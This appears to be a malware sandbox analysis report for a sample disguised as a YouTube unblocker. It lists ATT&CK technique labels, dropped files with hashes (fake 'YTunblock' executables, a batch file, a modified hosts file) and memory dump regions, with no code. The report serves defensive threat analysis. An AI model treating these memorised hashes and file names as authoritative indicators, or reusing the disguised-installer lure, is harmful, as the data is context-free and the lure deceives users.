
Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log

Filesize
522B

MD5
8334a471a4b492ece225b471b8ad2fc8

SHA1
1cb24640f32d23e8f7800bd0511b7b9c3011d992

SHA256
5612afe347d8549cc95a0c710602bcc7d7b224361b613c0a6ba362092300c169

SHA512
56ae2e83355c331b00d782797f5664c2f373eac240e811aab978732503ae05eb20b08730d2427ed90efa5a706d71b42b57153596a45a6b5592e3dd9128b81c36

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
4f029a99fa150f147b1bec0578520a1f

SHA1
76208adb6c12dded87f842af6b96633844f909e5

SHA256
bb5d093f15d0cbf907fd7f1a260f9b842dd851ea070239f04494492f45ef056f

SHA512
52351b3268400bcc8a6962cdc3e930ed3d07a95f09697c725741b5ff4cabd7f324120ba644f16adabe1227fdd7a6809be52e573fd24fe685e68f9d4cbc5191e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
095a8665381266a9645185b44ffb964a

SHA1
a3dc281566e17cfc54cfe243747c4bee183dac49

SHA256
f1596fb3d27a1a5e2921c16efdc545373ad17099e8bf2f2d6f2a719d5697a0dc

SHA512
46b77911ef4ed89099154fe2f8a58e10f4cf6bc5361183b95e9c5877eaad2509e4b4e82acbcf8ffc93df793433b39c930ebce0cfd16e1a3978346eb2c0d568be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
3b46dd7900c1f28e04ff63657255c836

SHA1
b063e4cab447d583aca034a86a31d76f59e5d272

SHA256
eca5ea32518f9646250953c5feb60b4e23b240d6dc18758a48b3e362c51d15f1

SHA512
7e3c424e36f6db2be1f5fff5cbd73470ce16e628bc217196b99553aaa6c9f91ea2df70185982635dde0b079f9dea3e36d1ec9861e66e83c9095600e8c3ec1b6c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9b80cd7a712469a4c45fec564313d9eb

SHA1
6125c01bc10d204ca36ad1110afe714678655f2d

SHA256
5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

SHA512
ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
f4bf3ca8753d6bb9725419fec1ec74b9

SHA1
71fce9d17d1d92873236a9a827c52eb9e4827f3d

SHA256
ca8697e4ada4c3d4aac2899b8aad4052ccd605fccee05ee0a831368bde2f7417

SHA512
a55a107ae8bcf833ea674413c765cd55096146c9634dff41884fcc851c12fe47753308099525c99ae44883facfb668c8b292dd915263f34ebd1190391cb28a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e5f8d907402e20efe80f7f78df2ca109

SHA1
3842bef7b297bf824cd3551a54776daa33b26572

SHA256
e8f9716c73b56fb86c975c31ec7631cc4dd62b0d08a7256bf3e4518ed38ffe6d

SHA512
4438deb34a663473ddb893d4da89a1ed48b12fd00d7446754aefb307709f85b8aece670bf83559e22f8cc3263ddbc78e38e19c2fb588a346d1a20b8ebe9bcab7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
894afb4ff3cd7ee1f69400e936f8fc9d

SHA1
aa0eb6ac58f8997940c1aa2e6f6c42d7c3837e51

SHA256
20948b37924c58362ffc5d1472667b53c6d7fc865ad541c901cebf41d04a03c9

SHA512
449494468d267f9689a277ce858dac7dfda04ceb568f60170645582fd631901a9ef780da8e420cba8a297edc11cd63a874e3429b95cf90e7261d2b9ab8850e98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
985b3105d8889886d6fd953575c54e08

SHA1
0f9a041240a344d82bac0a180520e7982c15f3cd

SHA256
5178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d

SHA512
0fd59bc4886b70aa3b7eeeaa23229b7fdc93410ca7f8452860e4a1bbda2559eaa5e4b05c3ec2d85f7d648daf3c16741f4c2c18f2dd3bae4cc4a4e57ae4f665b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b0a78e60bfb279d18fd3d6e7a67411f5

SHA1
9344fe3654a14bc66afb9dc6ea215fabfbe5c906

SHA256
a28890c82033d3deaf5770ecd1b0239c77321acc93704b1d4b1e167b91e30aeb

SHA512
9548be23bec645cd705482f78d43b63659e38cf879c34f7071f42fd86ee02039379a5e92fbe0f1c74c12aaebabdd8002f57eba111d3e855cbd0c89a110e346f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
674672487e98cee58ac7dbeeb37c6d43

SHA1
6315ca6c6b36f61007c74fba6b602937fbe7c8a4

SHA256
1004e8ec069713964fb345e009b40077ee4df62688e5398050c094ea95704b4b

SHA512
70c63ed61e3c90ae16e63ed991d426cb3bf1d28453d338c91dd358534dfe9d421bca23befe49f7d41a0f7951267f119a8ae5a5fa58d49ba53bd282a2a50caa3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i2e5xrxo.jzp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dazwnn.exe

Filesize
229KB

MD5
fed4a7197948ba327337b612254a673b

SHA1
2d1a9070dac7754ec592768654574fb933ec3730

SHA256
2f8e20e2e7712f7d896fe4fcbcb30161ef7abfc75b88584fc199c9203315efc7

SHA512
51bc82d032cee6689d62c98a5ce848297f8d55ecc03a4d506371db278abf418354294e9d5469d38be97fa41adb4d77932401dc0719eea33fb75c162fd0f32cff

Download Submit
C:\Users\Admin\AppData\Local\Temp\ldrynh.exe

Filesize
229KB

MD5
4bc09295bb5cf98d5e3df87fc1a2ed72

SHA1
c59cbee06c84683e59788df06c97f642ac1a402b

SHA256
9a7ba8617514eec0bc69b27fe7f105b8c5be4de6ae8e92be724c6d27b3f857ea

SHA512
a2643afeeb9e5e65ebe9a9e342b4a0d8def545ed2cb1d2e6ed76a3d6d87ed6b4858b316df1e31d70225c2a03557e14e1badb3cc74942f9f27f15285f19c77c63

Download Submit
C:\Users\Admin\AppData\Roaming\UnblockYT .exe

Filesize
1.8MB

MD5
ddf02dfa6df9ee4e157d675e55a055c7

SHA1
d6fc1b85378c9ffae39dfaa0fc3a6876193ce933

SHA256
6ec4b872cd4c8aa6859574fb02187bda31fb71cbace5026c9e0d89e078b61730

SHA512
79b32c992e1adea1700fac6e87fe1dac0562fc6ff927f16b7464fa32793ff41cc9c1ad9caf323a87213f0cda7c32d29e155e1a5eed8f18d09819d13515b1a4a0

Download Submit
C:\Users\Admin\AppData\Roaming\YTunblock.exe

Filesize
1.2MB

MD5
5c130e0ea8b936a34372663dd763f722

SHA1
cbb1efd33b28851682ae3f9699c79ffe705c780d

SHA256
262edf6e52c54494f19dd41c37307c6fb85bbd37820fb10df68a01f2f2fef644

SHA512
a4e7bc8a551507648651740ce87388929ab9c7c3c4997ba0c1fb15116a6e433e1660f11a65886b0ed7552264df74ce055a84fad4c96a057fb0b4c4c37b149f2e

Download Submit
C:\Users\Admin\AppData\Roaming\YTunblock.sfx.exe

Filesize
1.6MB

MD5
10aefe8560bf4e437d2f47bd469a59ff

SHA1
57c72df8758b6afcaa47d3dd9b46009b0d68f7e5

SHA256
56a5db69837d84f160c2ad3fd7c46ab658df9979d3ba34834a8b514e63626f11

SHA512
d8f6fd44f11b140c36bfa1d9d732f31d5bc308887fcce3605391ce30fa2fa360379d5c47e7ea2bb9ef5d7dea5b8f82bdd0d7e643a7d7d9de37b478ac7f43646d

Download Submit
C:\Users\Admin\AppData\Roaming\ .bat

Filesize
1KB

MD5
5807f01368bda72ebd943e8755fa2e0c

SHA1
f42940149bf0e256b14343c87f750c6cdac8ae72

SHA256
9c7be36ede7526e5d10e8af969dbf8d2b242ab9c52c107e9f42200fb0ee2ce2a

SHA512
31612135b0981a500b8b09c72809da0e66e0633885270aeb26de02c26dbdbb4d8b27299349cc352558a3c9ec18eda6840e380ca99473fde3882cbbe3e02dc107

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/552-241-0x000001839C6F0000-0x000001839C702000-memory.dmp

Filesize
72KB

Download
memory/552-202-0x00000183B4F60000-0x00000183B4FD6000-memory.dmp

Filesize
472KB

Download
memory/552-240-0x000001839C6C0000-0x000001839C6CA000-memory.dmp

Filesize
40KB

Download
memory/552-175-0x000001839A7C0000-0x000001839A800000-memory.dmp

Filesize
256KB

Download
memory/552-204-0x00000183B5010000-0x00000183B502E000-memory.dmp

Filesize
120KB

Download
memory/552-203-0x00000183B4EE0000-0x00000183B4F30000-memory.dmp

Filesize
320KB

Download
memory/1104-134-0x00000000700E0000-0x000000007012C000-memory.dmp

Filesize
304KB

Download
memory/1188-291-0x00000000006F0000-0x0000000000AA2000-memory.dmp

Filesize
3.7MB

Download
memory/1188-288-0x00000000006F0000-0x0000000000AA2000-memory.dmp

Filesize
3.7MB

Download
memory/1188-287-0x00000000006F0000-0x0000000000AA2000-memory.dmp

Filesize
3.7MB

Download
memory/1864-276-0x00000000006F0000-0x0000000000AA2000-memory.dmp

Filesize
3.7MB

Download
memory/1864-280-0x00000000006F0000-0x0000000000AA2000-memory.dmp

Filesize
3.7MB

Download
memory/1864-277-0x00000000006F0000-0x0000000000AA2000-memory.dmp

Filesize
3.7MB

Download
memory/2024-266-0x00000000006F0000-0x0000000000AA2000-memory.dmp

Filesize
3.7MB

Download
memory/2024-269-0x00000000006F0000-0x0000000000AA2000-memory.dmp

Filesize
3.7MB

Download
memory/2024-264-0x00000000006F0000-0x0000000000AA2000-memory.dmp

Filesize
3.7MB

Download
memory/3220-317-0x0000026B1D7C0000-0x0000026B1D800000-memory.dmp

Filesize
256KB

Download
memory/3288-112-0x00000000700E0000-0x000000007012C000-memory.dmp

Filesize
304KB

Download
memory/3380-154-0x00000000006F0000-0x0000000000AA2000-memory.dmp

Filesize
3.7MB

Download
memory/3380-155-0x00000000006F0000-0x0000000000AA2000-memory.dmp

Filesize
3.7MB

Download
memory/3380-156-0x00000000006F0000-0x0000000000AA2000-memory.dmp

Filesize
3.7MB

Download
memory/3380-160-0x00000000006F0000-0x0000000000AA2000-memory.dmp

Filesize
3.7MB

Download
memory/3604-80-0x0000000006340000-0x0000000006694000-memory.dmp

Filesize
3.3MB

Download
memory/3604-91-0x00000000700E0000-0x000000007012C000-memory.dmp

Filesize
304KB

Download
memory/4064-67-0x0000000007BC0000-0x0000000007C63000-memory.dmp

Filesize
652KB

Download
memory/4064-66-0x0000000006FE0000-0x0000000006FFE000-memory.dmp

Filesize
120KB

Download
memory/4064-39-0x0000000003090000-0x00000000030C6000-memory.dmp

Filesize
216KB

Download
memory/4064-40-0x0000000005BF0000-0x0000000006218000-memory.dmp

Filesize
6.2MB

Download
memory/4064-41-0x0000000005B00000-0x0000000005B22000-memory.dmp

Filesize
136KB

Download
memory/4064-42-0x0000000006220000-0x0000000006286000-memory.dmp

Filesize
408KB

Download
memory/4064-76-0x0000000008010000-0x0000000008018000-memory.dmp

Filesize
32KB

Download
memory/4064-75-0x0000000008030000-0x000000000804A000-memory.dmp

Filesize
104KB

Download
memory/4064-74-0x0000000007F30000-0x0000000007F44000-memory.dmp

Filesize
80KB

Download
memory/4064-73-0x0000000007F20000-0x0000000007F2E000-memory.dmp

Filesize
56KB

Download
memory/4064-72-0x0000000007EF0000-0x0000000007F01000-memory.dmp

Filesize
68KB

Download
memory/4064-71-0x0000000007F70000-0x0000000008006000-memory.dmp

Filesize
600KB

Download
memory/4064-70-0x0000000007D60000-0x0000000007D6A000-memory.dmp

Filesize
40KB

Download
memory/4064-69-0x0000000007CF0000-0x0000000007D0A000-memory.dmp

Filesize
104KB

Download
memory/4064-68-0x0000000008330000-0x00000000089AA000-memory.dmp

Filesize
6.5MB

Download
memory/4064-52-0x00000000064B0000-0x0000000006804000-memory.dmp

Filesize
3.3MB

Download
memory/4064-56-0x00000000700E0000-0x000000007012C000-memory.dmp

Filesize
304KB

Download
memory/4064-55-0x0000000006FA0000-0x0000000006FD2000-memory.dmp

Filesize
200KB

Download
memory/4064-54-0x0000000006A00000-0x0000000006A4C000-memory.dmp

Filesize
304KB

Download
memory/4064-53-0x00000000069C0000-0x00000000069DE000-memory.dmp

Filesize
120KB

Download
memory/4400-149-0x00000000071B0000-0x0000000007754000-memory.dmp

Filesize
5.6MB

Download
memory/4400-150-0x0000000006FB0000-0x0000000007042000-memory.dmp

Filesize
584KB

Download
memory/4400-151-0x0000000006F50000-0x0000000006F5A000-memory.dmp

Filesize
40KB

Download
memory/4400-161-0x00000000006E0000-0x0000000000A92000-memory.dmp

Filesize
3.7MB

Download
memory/4400-38-0x0000000005910000-0x0000000005976000-memory.dmp

Filesize
408KB

Download
memory/4400-37-0x0000000005870000-0x000000000590C000-memory.dmp

Filesize
624KB

Download
memory/4400-36-0x00000000006E0000-0x0000000000A92000-memory.dmp

Filesize
3.7MB

Download
memory/4400-35-0x00000000006E0000-0x0000000000A92000-memory.dmp

Filesize
3.7MB

Download
memory/4852-298-0x00000000006F0000-0x0000000000AA2000-memory.dmp

Filesize
3.7MB

Download
memory/4852-299-0x00000000006F0000-0x0000000000AA2000-memory.dmp

Filesize
3.7MB

Download
memory/4852-302-0x00000000006F0000-0x0000000000AA2000-memory.dmp

Filesize
3.7MB

Download
memory/5116-176-0x0000018656EE0000-0x0000018656F02000-memory.dmp

Filesize
136KB

Download